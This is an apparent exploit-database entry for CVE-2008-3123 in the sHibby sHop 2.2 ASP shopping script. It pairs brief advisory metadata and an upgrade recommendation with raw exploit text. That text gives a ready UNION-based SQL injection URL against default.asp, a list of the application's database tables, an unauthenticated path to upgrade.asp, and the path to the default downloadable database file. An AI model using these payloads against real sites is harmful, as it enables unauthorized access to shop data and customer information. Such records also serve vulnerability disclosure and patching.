sHibby sHop v2.2 - exploit.company

vendor:

Shibby Shop

by:

KnocKout

9.3

CVSS

HIGH

SQL Injection and Direct Access

CWE

Product Name: Shibby Shop

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: CVE-2008-3123

CPE: a:shibby_shop:shibby_shop:2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

sHibby sHop v2.2 is prone to a remote SQL injection vulnerability and direct access vulnerability. An attacker can exploit these issues to manipulate SQL queries, access sensitive information, and gain access to the underlying file system.

Mitigation:

Upgrade to the latest version of sHibby sHop.

Source

Exploit-DB raw data:

Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability

================================================================

[+] Author : KnocKout
[+] Special Thankz : Dr.Kacak
[+] System 0VerfL0verZ

=================================================================

Script : sHibby sHop
Verz: 2.2
Download : http://aspindir.com/goster/4476

 

SQL attack ;

http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar

Tables;

yasakli
ustmenu
urun_yorum
urun
ureticiler
tema
site_gel
siparis
sayfa
say_site
say_ip
say_hit
online
kategori
banner
ayarlar

 ------------
 
 Update file ( Direct Access )

 http://localsite.com/path/upgrade.asp
 

And default Database file

http://target.com/path/Db/urun.mdb

###############################################################

# milw0rm.com [2008-06-22]